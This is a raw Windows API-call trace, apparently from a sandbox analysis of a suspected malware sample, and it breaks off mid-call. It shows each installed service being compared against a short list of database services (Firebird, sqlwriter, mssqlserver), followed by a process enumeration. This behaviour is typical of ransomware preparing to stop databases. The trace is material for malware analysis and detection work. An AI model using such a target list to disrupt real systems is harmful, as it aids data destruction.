lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0289.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0289.413] lstrlenW (lpString="FontCache") returned 9 [0289.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0289.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0289.413] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0289.413] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0289.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0289.413] lstrlenW (lpString="gpsvc") returned 5 [0289.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0289.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0289.413] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0289.413] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0289.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0289.413] lstrlenW (lpString="iphlpsvc") returned 8 [0289.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0289.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0289.413] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0289.413] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0289.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0289.413] lstrlenW (lpString="KeyIso") returned 6 [0289.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0289.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0289.414] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0289.414] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0289.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0289.414] lstrlenW (lpString="LanmanServer") returned 12 [0289.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0289.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0289.414] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0289.414] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0289.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0289.414] lstrlenW (lpString="LanmanWorkstation") returned 17 [0289.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0289.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0289.414] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0289.414] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0289.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0289.414] lstrlenW (lpString="lfsvc") returned 5 [0289.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0289.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0289.414] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0289.414] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0289.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0289.415] lstrlenW (lpString="lmhosts") returned 7 [0289.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0289.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0289.415] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0289.415] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0289.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0289.415] lstrlenW (lpString="LSM") returned 3 [0289.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0289.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0289.415] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0289.415] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0289.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0289.415] lstrlenW (lpString="MpsSvc") returned 6 [0289.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0289.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0289.415] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0289.415] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0289.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0289.415] lstrlenW (lpString="NcbService") returned 10 [0289.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0289.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0289.416] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0289.416] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0289.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0289.416] lstrlenW (lpString="netprofm") returned 8 [0289.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0289.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0289.416] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0289.416] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0289.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0289.416] lstrlenW (lpString="NgcSvc") returned 6 [0289.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0289.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0289.416] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0289.416] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0289.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0289.416] lstrlenW (lpString="NlaSvc") returned 6 [0289.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0289.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0289.417] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0289.417] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0289.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0289.417] lstrlenW (lpString="nsi") returned 3 [0289.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0289.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0289.417] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0289.417] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0289.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0289.417] lstrlenW (lpString="PcaSvc") returned 6 [0289.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0289.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0289.417] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0289.417] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0289.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0289.417] lstrlenW (lpString="PlugPlay") returned 8 [0289.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0289.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0289.417] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0289.417] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0289.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0289.418] lstrlenW (lpString="Power") returned 5 [0289.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0289.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0289.418] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0289.418] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0289.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0289.418] lstrlenW (lpString="ProfSvc") returned 7 [0289.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0289.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0289.418] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0289.418] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0289.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0289.418] lstrlenW (lpString="RpcEptMapper") returned 12 [0289.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0289.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0289.418] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0289.418] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0289.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0289.418] lstrlenW (lpString="RpcSs") returned 5 [0289.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0289.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0289.418] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0289.419] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0289.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0289.419] lstrlenW (lpString="SamSs") returned 5 [0289.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0289.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0289.419] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0289.419] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0289.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0289.419] lstrlenW (lpString="Schedule") returned 8 [0289.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0289.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0289.419] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0289.419] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0289.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0289.419] lstrlenW (lpString="SecurityHealthService") returned 21 [0289.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0289.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0289.419] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0289.419] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0289.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0289.419] lstrlenW (lpString="SENS") returned 4 [0289.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0289.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0289.419] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0289.419] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0289.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0289.419] lstrlenW (lpString="ShellHWDetection") returned 16 [0289.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0289.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0289.420] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0289.420] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0289.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0289.420] lstrlenW (lpString="Spooler") returned 7 [0289.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0289.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0289.420] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0289.420] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0289.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0289.420] lstrlenW (lpString="StateRepository") returned 15 [0289.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0289.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0289.420] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0289.420] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0289.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0289.420] lstrlenW (lpString="SysMain") returned 7 [0289.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0289.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0289.420] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0289.420] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0289.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0289.420] lstrlenW (lpString="SystemEventsBroker") returned 18 [0289.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0289.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0289.421] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0289.421] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0289.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0289.421] lstrlenW (lpString="Themes") returned 6 [0289.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0289.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0289.421] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0289.421] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0289.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0289.421] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0289.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0289.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0289.421] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0289.421] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0289.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0289.421] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0289.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0289.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0289.421] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0289.421] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0289.422] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4022d78 | out: hHeap=0x470000) returned 1 [0289.422] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x448 [0289.431] Process32FirstW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.431] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.432] lstrlenW (lpString="System") returned 6 [0289.432] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.433] lstrlenW (lpString="smss.exe") returned 8 [0289.433] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.434] lstrlenW (lpString="csrss.exe") returned 9 [0289.434] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.435] lstrlenW (lpString="wininit.exe") returned 11 [0289.435] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.436] lstrlenW (lpString="csrss.exe") returned 9 [0289.436] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.437] lstrlenW (lpString="winlogon.exe") returned 12 [0289.437] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.437] lstrlenW (lpString="services.exe") returned 12 [0289.437] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0289.438] lstrlenW (lpString="lsass.exe") returned 9 [0289.438] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0289.439] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0289.439] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0289.440] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0289.440] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.441] lstrlenW (lpString="svchost.exe") returned 11 [0289.441] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.441] lstrlenW (lpString="svchost.exe") returned 11 [0289.441] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0289.442] lstrlenW (lpString="dwm.exe") returned 7 [0289.442] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.443] lstrlenW (lpString="svchost.exe") returned 11 [0289.443] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.444] lstrlenW (lpString="svchost.exe") returned 11 [0289.444] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.445] lstrlenW (lpString="svchost.exe") returned 11 [0289.445] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.445] lstrlenW (lpString="svchost.exe") returned 11 [0289.445] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.446] lstrlenW (lpString="svchost.exe") returned 11 [0289.446] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.447] lstrlenW (lpString="svchost.exe") returned 11 [0289.447] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.448] lstrlenW (lpString="svchost.exe") returned 11 [0289.448] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.448] lstrlenW (lpString="svchost.exe") returned 11 [0289.448] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.449] lstrlenW (lpString="svchost.exe") returned 11 [0289.449] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.450] lstrlenW (lpString="svchost.exe") returned 11 [0289.450] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0289.451] lstrlenW (lpString="spoolsv.exe") returned 11 [0289.451] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.452] lstrlenW (lpString="svchost.exe") returned 11 [0289.452] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0289.452] lstrlenW (lpString="audiodg.exe") returned 11 [0289.452] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0289.453] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0289.453] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0289.454] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0289.454] Process32NextW (in: hSnapshot=0x448, 